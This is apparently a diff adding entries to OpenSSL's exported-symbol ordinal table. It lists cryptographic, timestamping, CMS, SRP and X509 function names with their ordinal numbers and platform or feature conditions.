+ASN1_bn_print                           4295	EXIST::FUNCTION:BIO
+EVP_PKEY_asn1_get_count                 4296	EXIST::FUNCTION:
+ENGINE_register_pkey_asn1_meths         4297	EXIST::FUNCTION:ENGINE
+ASN1_PCTX_set_nm_flags                  4298	EXIST::FUNCTION:
+EVP_DigestVerifyInit                    4299	EXIST::FUNCTION:
+ENGINE_set_default_pkey_meths           4300	EXIST::FUNCTION:ENGINE
+TS_TST_INFO_get_policy_id               4301	EXIST::FUNCTION:
+TS_REQ_get_cert_req                     4302	EXIST::FUNCTION:
+X509_CRL_set_meth_data                  4303	EXIST::FUNCTION:
+PKCS8_pkey_set0                         4304	EXIST::FUNCTION:
+ASN1_STRING_copy                        4305	EXIST::FUNCTION:
+d2i_TS_TST_INFO_fp                      4306	EXIST::FUNCTION:
+X509_CRL_match                          4307	EXIST::FUNCTION:
+EVP_PKEY_asn1_set_private               4308	EXIST::FUNCTION:
+TS_TST_INFO_get_ext_d2i                 4309	EXIST::FUNCTION:
+TS_RESP_CTX_add_policy                  4310	EXIST::FUNCTION:
+d2i_TS_RESP                             4311	EXIST::FUNCTION:
+TS_CONF_load_certs                      4312	EXIST::FUNCTION:
+TS_TST_INFO_get_msg_imprint             4313	EXIST::FUNCTION:
+ERR_load_TS_strings                     4314	EXIST::FUNCTION:
+TS_TST_INFO_get_version                 4315	EXIST::FUNCTION:
+EVP_PKEY_CTX_dup                        4316	EXIST::FUNCTION:
+EVP_PKEY_meth_set_verify                4317	EXIST::FUNCTION:
+i2b_PublicKey_bio                       4318	EXIST::FUNCTION:
+TS_CONF_set_certs                       4319	EXIST::FUNCTION:
+EVP_PKEY_asn1_get0_info                 4320	EXIST::FUNCTION:
+TS_VERIFY_CTX_free                      4321	EXIST::FUNCTION:
+TS_REQ_get_ext_by_critical              4322	EXIST::FUNCTION:
+TS_RESP_CTX_set_serial_cb               4323	EXIST::FUNCTION:
+X509_CRL_get_meth_data                  4324	EXIST::FUNCTION:
+TS_RESP_CTX_set_time_cb                 4325	EXIST::FUNCTION:
+TS_MSG_IMPRINT_get_msg                  4326	EXIST::FUNCTION:
+TS_TST_INFO_ext_free                    4327	EXIST::FUNCTION:
+TS_REQ_get_version                      4328	EXIST::FUNCTION:
+TS_REQ_add_ext                          4329	EXIST::FUNCTION:
+EVP_PKEY_CTX_set_app_data               4330	EXIST::FUNCTION:
+OBJ_bsearch_                            4331	EXIST::FUNCTION:
+EVP_PKEY_meth_set_verifyctx             4332	EXIST::FUNCTION:
+i2d_PKCS7_bio_stream                    4333	EXIST::FUNCTION:
+CRYPTO_THREADID_set_numeric             4334	EXIST::FUNCTION:
+PKCS7_sign_add_signer                   4335	EXIST::FUNCTION:
+d2i_TS_TST_INFO_bio                     4336	EXIST::FUNCTION:
+TS_TST_INFO_get_ordering                4337	EXIST::FUNCTION:
+TS_RESP_print_bio                       4338	EXIST::FUNCTION:
+TS_TST_INFO_get_exts                    4339	EXIST::FUNCTION:
+HMAC_CTX_copy                           4340	EXIST::FUNCTION:HMAC
+PKCS5_pbe2_set_iv                       4341	EXIST::FUNCTION:
+ENGINE_get_pkey_asn1_meths              4342	EXIST::FUNCTION:ENGINE
+b2i_PrivateKey                          4343	EXIST::FUNCTION:
+EVP_PKEY_CTX_get_app_data               4344	EXIST::FUNCTION:
+TS_REQ_set_cert_req                     4345	EXIST::FUNCTION:
+CRYPTO_THREADID_set_callback            4346	EXIST::FUNCTION:
+TS_CONF_set_serial                      4347	EXIST::FUNCTION:
+TS_TST_INFO_free                        4348	EXIST::FUNCTION:
+d2i_TS_REQ_fp                           4349	EXIST::FUNCTION:
+TS_RESP_verify_response                 4350	EXIST::FUNCTION:
+i2d_ESS_ISSUER_SERIAL                   4351	EXIST::FUNCTION:
+TS_ACCURACY_get_seconds                 4352	EXIST::FUNCTION:
+EVP_CIPHER_do_all                       4353	EXIST::FUNCTION:
+b2i_PrivateKey_bio                      4354	EXIST::FUNCTION:
+OCSP_CERTID_dup                         4355	EXIST::FUNCTION:
+X509_PUBKEY_get0_param                  4356	EXIST::FUNCTION:
+TS_MSG_IMPRINT_dup                      4357	EXIST::FUNCTION:
+PKCS7_print_ctx                         4358	EXIST::FUNCTION:
+i2d_TS_REQ_bio                          4359	EXIST::FUNCTION:
+EVP_whirlpool                           4360	EXIST:!VMSVAX:FUNCTION:WHIRLPOOL
+EVP_PKEY_asn1_set_param                 4361	EXIST::FUNCTION:
+EVP_PKEY_meth_set_encrypt               4362	EXIST::FUNCTION:
+ASN1_PCTX_set_flags                     4363	EXIST::FUNCTION:
+i2d_ESS_CERT_ID                         4364	EXIST::FUNCTION:
+TS_VERIFY_CTX_new                       4365	EXIST::FUNCTION:
+TS_RESP_CTX_set_extension_cb            4366	EXIST::FUNCTION:
+ENGINE_register_all_pkey_meths          4367	EXIST::FUNCTION:ENGINE
+TS_RESP_CTX_set_status_info_cond        4368	EXIST:!VMS:FUNCTION:
+TS_RESP_CTX_set_stat_info_cond          4368	EXIST:VMS:FUNCTION:
+EVP_PKEY_verify                         4369	EXIST::FUNCTION:
+WHIRLPOOL_Final                         4370	EXIST:!VMSVAX:FUNCTION:WHIRLPOOL
+X509_CRL_METHOD_new                     4371	EXIST::FUNCTION:
+EVP_DigestSignFinal                     4372	EXIST::FUNCTION:
+TS_RESP_CTX_set_def_policy              4373	EXIST::FUNCTION:
+NETSCAPE_X509_it                        4374	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+NETSCAPE_X509_it                        4374	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+TS_RESP_create_response                 4375	EXIST::FUNCTION:
+PKCS7_SIGNER_INFO_get0_algs             4376	EXIST::FUNCTION:
+TS_TST_INFO_get_nonce                   4377	EXIST::FUNCTION:
+EVP_PKEY_decrypt_old                    4378	EXIST::FUNCTION:
+TS_TST_INFO_set_policy_id               4379	EXIST::FUNCTION:
+TS_CONF_set_ess_cert_id_chain           4380	EXIST::FUNCTION:
+EVP_PKEY_CTX_get0_pkey                  4381	EXIST::FUNCTION:
+d2i_TS_REQ                              4382	EXIST::FUNCTION:
+EVP_PKEY_asn1_find_str                  4383	EXIST::FUNCTION:
+BIO_f_asn1                              4384	EXIST::FUNCTION:
+ESS_SIGNING_CERT_new                    4385	EXIST::FUNCTION:
+EVP_PBE_find                            4386	EXIST::FUNCTION:
+X509_CRL_get0_by_cert                   4387	EXIST::FUNCTION:
+EVP_PKEY_derive                         4388	EXIST::FUNCTION:
+i2d_TS_REQ                              4389	EXIST::FUNCTION:
+TS_TST_INFO_delete_ext                  4390	EXIST::FUNCTION:
+ESS_ISSUER_SERIAL_free                  4391	EXIST::FUNCTION:
+ASN1_PCTX_set_str_flags                 4392	EXIST::FUNCTION:
+ENGINE_get_pkey_asn1_meth_str           4393	EXIST::FUNCTION:ENGINE
+TS_CONF_set_signer_key                  4394	EXIST::FUNCTION:
+TS_ACCURACY_get_millis                  4395	EXIST::FUNCTION:
+TS_RESP_get_token                       4396	EXIST::FUNCTION:
+TS_ACCURACY_dup                         4397	EXIST::FUNCTION:
+ENGINE_register_all_pkey_asn1_meths     4398	EXIST:!VMS:FUNCTION:ENGINE
+ENGINE_reg_all_pkey_asn1_meths          4398	EXIST:VMS:FUNCTION:ENGINE
+X509_CRL_set_default_method             4399	EXIST::FUNCTION:
+CRYPTO_THREADID_hash                    4400	EXIST::FUNCTION:
+CMS_ContentInfo_print_ctx               4401	EXIST::FUNCTION:CMS
+TS_RESP_free                            4402	EXIST::FUNCTION:
+ISSUING_DIST_POINT_free                 4403	EXIST::FUNCTION:
+ESS_ISSUER_SERIAL_new                   4404	EXIST::FUNCTION:
+CMS_add1_crl                            4405	EXIST::FUNCTION:CMS
+PKCS7_add1_attrib_digest                4406	EXIST::FUNCTION:
+TS_RESP_CTX_add_md                      4407	EXIST::FUNCTION:
+TS_TST_INFO_dup                         4408	EXIST::FUNCTION:
+ENGINE_set_pkey_asn1_meths              4409	EXIST::FUNCTION:ENGINE
+PEM_write_bio_Parameters                4410	EXIST::FUNCTION:
+TS_TST_INFO_get_accuracy                4411	EXIST::FUNCTION:
+X509_CRL_get0_by_serial                 4412	EXIST::FUNCTION:
+TS_TST_INFO_set_version                 4413	EXIST::FUNCTION:
+TS_RESP_CTX_get_tst_info                4414	EXIST::FUNCTION:
+TS_RESP_verify_signature                4415	EXIST::FUNCTION:
+CRYPTO_THREADID_get_callback            4416	EXIST::FUNCTION:
+TS_TST_INFO_get_tsa                     4417	EXIST::FUNCTION:
+TS_STATUS_INFO_new                      4418	EXIST::FUNCTION:
+EVP_PKEY_CTX_get_cb                     4419	EXIST::FUNCTION:
+TS_REQ_get_ext_d2i                      4420	EXIST::FUNCTION:
+GENERAL_NAME_set0_othername             4421	EXIST::FUNCTION:
+TS_TST_INFO_get_ext_count               4422	EXIST::FUNCTION:
+TS_RESP_CTX_get_request                 4423	EXIST::FUNCTION:
+i2d_NETSCAPE_X509                       4424	EXIST::FUNCTION:
+ENGINE_get_pkey_meth_engine             4425	EXIST::FUNCTION:ENGINE
+EVP_PKEY_meth_set_signctx               4426	EXIST::FUNCTION:
+EVP_PKEY_asn1_copy                      4427	EXIST::FUNCTION:
+ASN1_TYPE_cmp                           4428	EXIST::FUNCTION:
+EVP_CIPHER_do_all_sorted                4429	EXIST::FUNCTION:
+EVP_PKEY_CTX_free                       4430	EXIST::FUNCTION:
+ISSUING_DIST_POINT_it                   4431	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ISSUING_DIST_POINT_it                   4431	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_TS_MSG_IMPRINT_fp                   4432	EXIST::FUNCTION:
+X509_STORE_get1_certs                   4433	EXIST::FUNCTION:
+EVP_PKEY_CTX_get_operation              4434	EXIST::FUNCTION:
+d2i_ESS_SIGNING_CERT                    4435	EXIST::FUNCTION:
+TS_CONF_set_ordering                    4436	EXIST::FUNCTION:
+EVP_PBE_alg_add_type                    4437	EXIST::FUNCTION:
+TS_REQ_set_version                      4438	EXIST::FUNCTION:
+EVP_PKEY_get0                           4439	EXIST::FUNCTION:
+BIO_asn1_set_suffix                     4440	EXIST::FUNCTION:
+i2d_TS_STATUS_INFO                      4441	EXIST::FUNCTION:
+EVP_MD_do_all                           4442	EXIST::FUNCTION:
+TS_TST_INFO_set_accuracy                4443	EXIST::FUNCTION:
+PKCS7_add_attrib_content_type           4444	EXIST::FUNCTION:
+ERR_remove_thread_state                 4445	EXIST::FUNCTION:
+EVP_PKEY_meth_add0                      4446	EXIST::FUNCTION:
+TS_TST_INFO_set_tsa                     4447	EXIST::FUNCTION:
+EVP_PKEY_meth_new                       4448	EXIST::FUNCTION:
+WHIRLPOOL_Update                        4449	EXIST:!VMSVAX:FUNCTION:WHIRLPOOL
+TS_CONF_set_accuracy                    4450	EXIST::FUNCTION:
+ASN1_PCTX_set_oid_flags                 4451	EXIST::FUNCTION:
+ESS_SIGNING_CERT_dup                    4452	EXIST::FUNCTION:
+d2i_TS_REQ_bio                          4453	EXIST::FUNCTION:
+X509_time_adj_ex                        4454	EXIST::FUNCTION:
+TS_RESP_CTX_add_flags                   4455	EXIST::FUNCTION:
+d2i_TS_STATUS_INFO                      4456	EXIST::FUNCTION:
+TS_MSG_IMPRINT_set_msg                  4457	EXIST::FUNCTION:
+BIO_asn1_get_suffix                     4458	EXIST::FUNCTION:
+TS_REQ_free                             4459	EXIST::FUNCTION:
+EVP_PKEY_meth_free                      4460	EXIST::FUNCTION:
+TS_REQ_get_exts                         4461	EXIST::FUNCTION:
+TS_RESP_CTX_set_clock_precision_digits  4462	EXIST:!VMS:FUNCTION:
+TS_RESP_CTX_set_clk_prec_digits         4462	EXIST:VMS:FUNCTION:
+TS_RESP_CTX_add_failure_info            4463	EXIST::FUNCTION:
+i2d_TS_RESP_bio                         4464	EXIST::FUNCTION:
+EVP_PKEY_CTX_get0_peerkey               4465	EXIST::FUNCTION:
+PEM_write_bio_CMS_stream                4466	EXIST::FUNCTION:CMS
+TS_REQ_new                              4467	EXIST::FUNCTION:
+TS_MSG_IMPRINT_new                      4468	EXIST::FUNCTION:
+EVP_PKEY_meth_find                      4469	EXIST::FUNCTION:
+EVP_PKEY_id                             4470	EXIST::FUNCTION:
+TS_TST_INFO_set_serial                  4471	EXIST::FUNCTION:
+a2i_GENERAL_NAME                        4472	EXIST::FUNCTION:
+TS_CONF_set_crypto_device               4473	EXIST::FUNCTION:
+EVP_PKEY_verify_init                    4474	EXIST::FUNCTION:
+TS_CONF_set_policies                    4475	EXIST::FUNCTION:
+ASN1_PCTX_new                           4476	EXIST::FUNCTION:
+ESS_CERT_ID_free                        4477	EXIST::FUNCTION:
+ENGINE_unregister_pkey_meths            4478	EXIST::FUNCTION:ENGINE
+TS_MSG_IMPRINT_free                     4479	EXIST::FUNCTION:
+TS_VERIFY_CTX_init                      4480	EXIST::FUNCTION:
+PKCS7_stream                            4481	EXIST::FUNCTION:
+TS_RESP_CTX_set_certs                   4482	EXIST::FUNCTION:
+TS_CONF_set_def_policy                  4483	EXIST::FUNCTION:
+ASN1_GENERALIZEDTIME_adj                4484	EXIST::FUNCTION:
+NETSCAPE_X509_new                       4485	EXIST::FUNCTION:
+TS_ACCURACY_free                        4486	EXIST::FUNCTION:
+TS_RESP_get_tst_info                    4487	EXIST::FUNCTION:
+EVP_PKEY_derive_set_peer                4488	EXIST::FUNCTION:
+PEM_read_bio_Parameters                 4489	EXIST::FUNCTION:
+TS_CONF_set_clock_precision_digits      4490	EXIST:!VMS:FUNCTION:
+TS_CONF_set_clk_prec_digits             4490	EXIST:VMS:FUNCTION:
+ESS_ISSUER_SERIAL_dup                   4491	EXIST::FUNCTION:
+TS_ACCURACY_get_micros                  4492	EXIST::FUNCTION:
+ASN1_PCTX_get_str_flags                 4493	EXIST::FUNCTION:
+NAME_CONSTRAINTS_check                  4494	EXIST::FUNCTION:
+ASN1_BIT_STRING_check                   4495	EXIST::FUNCTION:
+X509_check_akid                         4496	EXIST::FUNCTION:
+ENGINE_unregister_pkey_asn1_meths       4497	EXIST:!VMS:FUNCTION:ENGINE
+ENGINE_unreg_pkey_asn1_meths            4497	EXIST:VMS:FUNCTION:ENGINE
+ASN1_PCTX_free                          4498	EXIST::FUNCTION:
+PEM_write_bio_ASN1_stream               4499	EXIST::FUNCTION:
+i2d_ASN1_bio_stream                     4500	EXIST::FUNCTION:
+TS_X509_ALGOR_print_bio                 4501	EXIST::FUNCTION:
+EVP_PKEY_meth_set_cleanup               4502	EXIST::FUNCTION:
+EVP_PKEY_asn1_free                      4503	EXIST::FUNCTION:
+ESS_SIGNING_CERT_free                   4504	EXIST::FUNCTION:
+TS_TST_INFO_set_msg_imprint             4505	EXIST::FUNCTION:
+GENERAL_NAME_cmp                        4506	EXIST::FUNCTION:
+d2i_ASN1_SET_ANY                        4507	EXIST::FUNCTION:
+ENGINE_set_pkey_meths                   4508	EXIST::FUNCTION:ENGINE
+i2d_TS_REQ_fp                           4509	EXIST::FUNCTION:
+d2i_ASN1_SEQUENCE_ANY                   4510	EXIST::FUNCTION:
+GENERAL_NAME_get0_otherName             4511	EXIST::FUNCTION:
+d2i_ESS_CERT_ID                         4512	EXIST::FUNCTION:
+OBJ_find_sigid_algs                     4513	EXIST::FUNCTION:
+EVP_PKEY_meth_set_keygen                4514	EXIST::FUNCTION:
+PKCS5_PBKDF2_HMAC                       4515	EXIST::FUNCTION:
+EVP_PKEY_paramgen                       4516	EXIST::FUNCTION:
+EVP_PKEY_meth_set_paramgen              4517	EXIST::FUNCTION:
+BIO_new_PKCS7                           4518	EXIST::FUNCTION:
+EVP_PKEY_verify_recover                 4519	EXIST::FUNCTION:
+TS_ext_print_bio                        4520	EXIST::FUNCTION:
+TS_ASN1_INTEGER_print_bio               4521	EXIST::FUNCTION:
+check_defer                             4522	EXIST::FUNCTION:
+DSO_pathbyaddr                          4523	EXIST::FUNCTION:
+EVP_PKEY_set_type                       4524	EXIST::FUNCTION:
+TS_ACCURACY_set_micros                  4525	EXIST::FUNCTION:
+TS_REQ_to_TS_VERIFY_CTX                 4526	EXIST::FUNCTION:
+EVP_PKEY_meth_set_copy                  4527	EXIST::FUNCTION:
+ASN1_PCTX_set_cert_flags                4528	EXIST::FUNCTION:
+TS_TST_INFO_get_ext                     4529	EXIST::FUNCTION:
+EVP_PKEY_asn1_set_ctrl                  4530	EXIST::FUNCTION:
+TS_TST_INFO_get_ext_by_critical         4531	EXIST::FUNCTION:
+EVP_PKEY_CTX_new_id                     4532	EXIST::FUNCTION:
+TS_REQ_get_ext_by_OBJ                   4533	EXIST::FUNCTION:
+TS_CONF_set_signer_cert                 4534	EXIST::FUNCTION:
+X509_NAME_hash_old                      4535	EXIST::FUNCTION:
+ASN1_TIME_set_string                    4536	EXIST::FUNCTION:
+EVP_MD_flags                            4537	EXIST::FUNCTION:
+TS_RESP_CTX_free                        4538	EXIST::FUNCTION:
+DSAparams_dup                           4539	EXIST::FUNCTION:DSA
+DHparams_dup                            4540	EXIST::FUNCTION:DH
+OCSP_REQ_CTX_add1_header                4541	EXIST::FUNCTION:
+OCSP_REQ_CTX_set1_req                   4542	EXIST::FUNCTION:
+X509_STORE_set_verify_cb                4543	EXIST::FUNCTION:
+X509_STORE_CTX_get0_current_crl         4544	EXIST::FUNCTION:
+X509_STORE_CTX_get0_parent_ctx          4545	EXIST::FUNCTION:
+X509_STORE_CTX_get0_current_issuer      4546	EXIST:!VMS:FUNCTION:
+X509_STORE_CTX_get0_cur_issuer          4546	EXIST:VMS:FUNCTION:
+X509_issuer_name_hash_old               4547	EXIST::FUNCTION:MD5
+X509_subject_name_hash_old              4548	EXIST::FUNCTION:MD5
+EVP_CIPHER_CTX_copy                     4549	EXIST::FUNCTION:
+UI_method_get_prompt_constructor        4550	EXIST:!VMS:FUNCTION:
+UI_method_get_prompt_constructr         4550	EXIST:VMS:FUNCTION:
+UI_method_set_prompt_constructor        4551	EXIST:!VMS:FUNCTION:
+UI_method_set_prompt_constructr         4551	EXIST:VMS:FUNCTION:
+EVP_read_pw_string_min                  4552	EXIST::FUNCTION:
+CRYPTO_cts128_encrypt                   4553	EXIST::FUNCTION:
+CRYPTO_cts128_decrypt_block             4554	EXIST::FUNCTION:
+CRYPTO_cfb128_1_encrypt                 4555	EXIST::FUNCTION:
+CRYPTO_cbc128_encrypt                   4556	EXIST::FUNCTION:
+CRYPTO_ctr128_encrypt                   4557	EXIST::FUNCTION:
+CRYPTO_ofb128_encrypt                   4558	EXIST::FUNCTION:
+CRYPTO_cts128_decrypt                   4559	EXIST::FUNCTION:
+CRYPTO_cts128_encrypt_block             4560	EXIST::FUNCTION:
+CRYPTO_cbc128_decrypt                   4561	EXIST::FUNCTION:
+CRYPTO_cfb128_encrypt                   4562	EXIST::FUNCTION:
+CRYPTO_cfb128_8_encrypt                 4563	EXIST::FUNCTION:
+OPENSSL_strcasecmp                      4564	EXIST::FUNCTION:
+OPENSSL_memcmp                          4565	EXIST::FUNCTION:
+OPENSSL_strncasecmp                     4566	EXIST::FUNCTION:
+OPENSSL_gmtime                          4567	EXIST::FUNCTION:
+OPENSSL_gmtime_adj                      4568	EXIST::FUNCTION:
+SRP_VBASE_get_by_user                   4569	EXIST::FUNCTION:SRP
+SRP_Calc_server_key                     4570	EXIST::FUNCTION:SRP
+SRP_create_verifier                     4571	EXIST::FUNCTION:SRP
+SRP_create_verifier_BN                  4572	EXIST::FUNCTION:SRP
+SRP_Calc_u                              4573	EXIST::FUNCTION:SRP
+SRP_VBASE_free                          4574	EXIST::FUNCTION:SRP
+SRP_Calc_client_key                     4575	EXIST::FUNCTION:SRP
+SRP_get_default_gN                      4576	EXIST::FUNCTION:SRP
+SRP_Calc_x                              4577	EXIST::FUNCTION:SRP
+SRP_Calc_B                              4578	EXIST::FUNCTION:SRP
+SRP_VBASE_new                           4579	EXIST::FUNCTION:SRP
+SRP_check_known_gN_param                4580	EXIST::FUNCTION:SRP
+SRP_Calc_A                              4581	EXIST::FUNCTION:SRP
+SRP_Verify_A_mod_N                      4582	EXIST::FUNCTION:SRP
+SRP_VBASE_init                          4583	EXIST::FUNCTION:SRP
+SRP_Verify_B_mod_N                      4584	EXIST::FUNCTION:SRP
+EC_KEY_set_public_key_affine_coordinates 4585	EXIST:!VMS:FUNCTION:EC
+EC_KEY_set_pub_key_aff_coords           4585	EXIST:VMS:FUNCTION:EC
+EVP_aes_192_ctr                         4586	EXIST::FUNCTION:AES
+EVP_PKEY_meth_get0_info                 4587	EXIST::FUNCTION:
+EVP_PKEY_meth_copy                      4588	EXIST::FUNCTION:
+ERR_add_error_vdata                     4589	EXIST::FUNCTION:
+EVP_aes_128_ctr                         4590	EXIST::FUNCTION:AES
+EVP_aes_256_ctr                         4591	EXIST::FUNCTION:AES
+EC_GFp_nistp224_method                  4592	EXIST::FUNCTION:EC,EC_NISTP_64_GCC_128
+EC_KEY_get_flags                        4593	EXIST::FUNCTION:EC
+RSA_padding_add_PKCS1_PSS_mgf1          4594	EXIST::FUNCTION:RSA
+EVP_aes_128_xts                         4595	EXIST::FUNCTION:AES
+private_SHA224_Init                     4596	EXIST:OPENSSL_FIPS:FUNCTION:SHA,SHA256
+private_AES_set_decrypt_key             4597	EXIST::FUNCTION:AES
+private_WHIRLPOOL_Init                  4598	EXIST:OPENSSL_FIPS:FUNCTION:WHIRLPOOL
+EVP_aes_256_xts                         4599	EXIST::FUNCTION:AES
+private_SHA512_Init                     4600	EXIST:OPENSSL_FIPS:FUNCTION:SHA,SHA512
+EVP_aes_128_gcm                         4601	EXIST::FUNCTION:AES
+EC_KEY_clear_flags                      4602	EXIST::FUNCTION:EC
+EC_KEY_set_flags                        4603	EXIST::FUNCTION:EC
+private_DES_set_key_unchecked           4604	EXIST:OPENSSL_FIPS:FUNCTION:DES
+EVP_aes_256_ccm                         4605	EXIST::FUNCTION:AES
+private_AES_set_encrypt_key             4606	EXIST::FUNCTION:AES
+RSA_verify_PKCS1_PSS_mgf1               4607	EXIST::FUNCTION:RSA
+private_SHA1_Init                       4608	EXIST:OPENSSL_FIPS:FUNCTION:SHA,SHA1
+EVP_aes_128_ccm                         4609	EXIST::FUNCTION:AES
+private_SEED_set_key                    4610	EXIST:OPENSSL_FIPS:FUNCTION:SEED
+EVP_aes_192_gcm                         4611	EXIST::FUNCTION:AES
+X509_ALGOR_set_md                       4612	EXIST::FUNCTION:
+private_SHA256_Init                     4613	EXIST:OPENSSL_FIPS:FUNCTION:SHA,SHA256
+RAND_init_fips                          4614	EXIST:OPENSSL_FIPS:FUNCTION:
+EVP_aes_256_gcm                         4615	EXIST::FUNCTION:AES
+private_SHA384_Init                     4616	EXIST:OPENSSL_FIPS:FUNCTION:SHA,SHA512
+EVP_aes_192_ccm                         4617	EXIST::FUNCTION:AES
+CMAC_CTX_copy                           4618	EXIST::FUNCTION:
+CMAC_CTX_free                           4619	EXIST::FUNCTION:
+CMAC_CTX_get0_cipher_ctx                4620	EXIST::FUNCTION:
+CMAC_CTX_cleanup                        4621	EXIST::FUNCTION:
+CMAC_Init                               4622	EXIST::FUNCTION:
+CMAC_Update                             4623	EXIST::FUNCTION:
+CMAC_resume                             4624	EXIST::FUNCTION:
+CMAC_CTX_new                            4625	EXIST::FUNCTION:
+CMAC_Final                              4626	EXIST::FUNCTION:
+CRYPTO_ctr128_encrypt_ctr32             4627	EXIST::FUNCTION:
+CRYPTO_gcm128_release                   4628	EXIST::FUNCTION:
+CRYPTO_ccm128_decrypt_ccm64             4629	EXIST::FUNCTION:
+CRYPTO_ccm128_encrypt                   4630	EXIST::FUNCTION:
+CRYPTO_gcm128_encrypt                   4631	EXIST::FUNCTION:
+CRYPTO_xts128_encrypt                   4632	EXIST::FUNCTION:
+EVP_rc4_hmac_md5                        4633	EXIST::FUNCTION:MD5,RC4
+CRYPTO_nistcts128_decrypt_block         4634	EXIST::FUNCTION:
+CRYPTO_gcm128_setiv                     4635	EXIST::FUNCTION:
+CRYPTO_nistcts128_encrypt               4636	EXIST::FUNCTION:
+EVP_aes_128_cbc_hmac_sha1               4637	EXIST::FUNCTION:AES,SHA,SHA1
+CRYPTO_gcm128_tag                       4638	EXIST::FUNCTION:
+CRYPTO_ccm128_encrypt_ccm64             4639	EXIST::FUNCTION:
+ENGINE_load_rdrand                      4640	EXIST::FUNCTION:ENGINE
+CRYPTO_ccm128_setiv                     4641	EXIST::FUNCTION:
+CRYPTO_nistcts128_encrypt_block         4642	EXIST::FUNCTION:
+CRYPTO_gcm128_aad                       4643	EXIST::FUNCTION:
+CRYPTO_ccm128_init                      4644	EXIST::FUNCTION:
+CRYPTO_nistcts128_decrypt               4645	EXIST::FUNCTION:
+CRYPTO_gcm128_new                       4646	EXIST::FUNCTION:
+CRYPTO_ccm128_tag                       4647	EXIST::FUNCTION:
+CRYPTO_ccm128_decrypt                   4648	EXIST::FUNCTION:
+CRYPTO_ccm128_aad                       4649	EXIST::FUNCTION:
+CRYPTO_gcm128_init                      4650	EXIST::FUNCTION:
+CRYPTO_gcm128_decrypt                   4651	EXIST::FUNCTION:
+ENGINE_load_rsax                        4652	NOEXIST::FUNCTION:
+CRYPTO_gcm128_decrypt_ctr32             4653	EXIST::FUNCTION:
+CRYPTO_gcm128_encrypt_ctr32             4654	EXIST::FUNCTION:
+CRYPTO_gcm128_finish                    4655	EXIST::FUNCTION:
+EVP_aes_256_cbc_hmac_sha1               4656	EXIST::FUNCTION:AES,SHA,SHA1
+PKCS5_pbkdf2_set                        4657	EXIST::FUNCTION:
+CMS_add0_recipient_password             4658	EXIST::FUNCTION:CMS
+CMS_decrypt_set1_password               4659	EXIST::FUNCTION:CMS
+CMS_RecipientInfo_set0_password         4660	EXIST::FUNCTION:CMS
+RAND_set_fips_drbg_type                 4661	EXIST:OPENSSL_FIPS:FUNCTION:
+X509_REQ_sign_ctx                       4662	EXIST::FUNCTION:EVP
+RSA_PSS_PARAMS_new                      4663	EXIST::FUNCTION:RSA
+X509_CRL_sign_ctx                       4664	EXIST::FUNCTION:EVP
+X509_signature_dump                     4665	EXIST::FUNCTION:EVP
+d2i_RSA_PSS_PARAMS                      4666	EXIST::FUNCTION:RSA
+RSA_PSS_PARAMS_it                       4667	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RSA
+RSA_PSS_PARAMS_it                       4667	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RSA
+RSA_PSS_PARAMS_free                     4668	EXIST::FUNCTION:RSA
+X509_sign_ctx                           4669	EXIST::FUNCTION:EVP
+i2d_RSA_PSS_PARAMS                      4670	EXIST::FUNCTION:RSA
+ASN1_item_sign_ctx                      4671	EXIST::FUNCTION:EVP
+EC_GFp_nistp521_method                  4672	EXIST::FUNCTION:EC,EC_NISTP_64_GCC_128
+EC_GFp_nistp256_method                  4673	EXIST::FUNCTION:EC,EC_NISTP_64_GCC_128
+OPENSSL_stderr                          4674	EXIST::FUNCTION:
+OPENSSL_cpuid_setup                     4675	EXIST::FUNCTION:
+OPENSSL_showfatal                       4676	EXIST::FUNCTION:
+BIO_new_dgram_sctp                      4677	EXIST::FUNCTION:SCTP
+BIO_dgram_sctp_msg_waiting              4678	EXIST::FUNCTION:SCTP
+BIO_dgram_sctp_wait_for_dry             4679	EXIST::FUNCTION:SCTP
+BIO_s_datagram_sctp                     4680	EXIST::FUNCTION:DGRAM,SCTP
+BIO_dgram_is_sctp                       4681	EXIST::FUNCTION:SCTP
+BIO_dgram_sctp_notification_cb          4682	EXIST::FUNCTION:SCTP
+i2d_DHxparams                           4683	EXIST::FUNCTION:DH
+EC_curve_nist2nid                       4684	EXIST::FUNCTION:EC
+DH_get_1024_160                         4685	EXIST::FUNCTION:DH
+PEM_write_DHxparams                     4686	EXIST:!WIN16:FUNCTION:DH
+d2i_DHxparams                           4687	EXIST::FUNCTION:DH
+EC_curve_nid2nist                       4688	EXIST::FUNCTION:EC
+DH_get_2048_256                         4689	EXIST::FUNCTION:DH
+PEM_write_bio_DHxparams                 4690	EXIST::FUNCTION:DH
+DH_get_2048_224                         4691	EXIST::FUNCTION:DH
+X509_chain_check_suiteb                 4692	EXIST::FUNCTION:
+X509_chain_up_ref                       4693	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set1_ip_asc           4694	EXIST::FUNCTION:
+X509_CRL_check_suiteb                   4695	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set1_email            4696	EXIST::FUNCTION:
+X509_check_email                        4697	EXIST::FUNCTION:
+X509_check_host                         4698	EXIST::FUNCTION:
+X509_check_ip_asc                       4699	EXIST::FUNCTION:
+X509_get0_signature                     4700	EXIST::FUNCTION:
+X509_get_signature_nid                  4701	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set1_host             4702	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set1_ip               4703	EXIST::FUNCTION:
+X509_check_ip                           4704	EXIST::FUNCTION:
+X509_STORE_set_lookup_crls_cb           4705	EXIST::FUNCTION:
+X509_CRL_diff                           4706	EXIST::FUNCTION:
+X509_CRL_http_nbio                      4707	EXIST::FUNCTION:EVP
+OCSP_REQ_CTX_i2d                        4708	EXIST::FUNCTION:
+OCSP_REQ_CTX_get0_mem_bio               4709	EXIST::FUNCTION:
+X509_STORE_CTX_get0_store               4710	EXIST::FUNCTION:
+X509_REVOKED_dup                        4711	EXIST::FUNCTION:
+CMS_RecipientInfo_encrypt               4712	EXIST::FUNCTION:CMS
+OCSP_REQ_CTX_http                       4713	EXIST::FUNCTION:
+OCSP_REQ_CTX_nbio                       4714	EXIST::FUNCTION:
+X509_http_nbio                          4715	EXIST::FUNCTION:EVP
+OCSP_set_max_response_length            4716	EXIST::FUNCTION:
